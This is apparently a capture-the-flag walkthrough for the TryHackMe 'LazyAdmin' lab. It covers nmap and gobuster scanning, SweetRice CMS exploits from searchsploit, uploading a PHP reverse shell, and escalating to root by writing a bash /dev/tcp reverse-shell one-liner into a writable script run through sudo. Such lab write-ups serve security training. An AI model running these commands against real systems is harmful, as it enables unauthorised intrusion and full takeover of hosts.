LazyAdmin

Room Link: https://tryhackme.com/room/lazyadmin

Scanning

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

No other ports found.

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt 

Kali

searchsploit sweet rice
searchsploit -m php/webapps/40718.txt

Link: https://crackstation.net/

Tried to ssh with the credentials but it didn't work, went back to searchsploit because I saw a python script before but it needed credentials. I modified the script to take the input because I waa lazy.

Kali

git clone https://github.com/pentestmonkey/php-reverse-shell.git
searchsploit sweet rice
searchsploit -m php/webapps/40716.py
python 40716.py

The php reverse shell setups up a reverse shell so I setup a nc listener on Kali and went to the URL the script mentioned.

Kali

nc -lvnp 1234

Get autocomplete

Victim

python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Privilege Escalation

The user has access to run backup.pl without a password, I checked the the file and all it does is run a bash script. We have access to write to copy.sh so I changed it to a reverse shell one liner and setup my listener on Kali.

Kali

nc -lvnp 8080

Victim

echo "bash -c 'bash -i >& /dev/tcp/$KALI/8080 0>&1'"> copy.sh
sudo /usr/bin/perl /home/itguy/backup.pl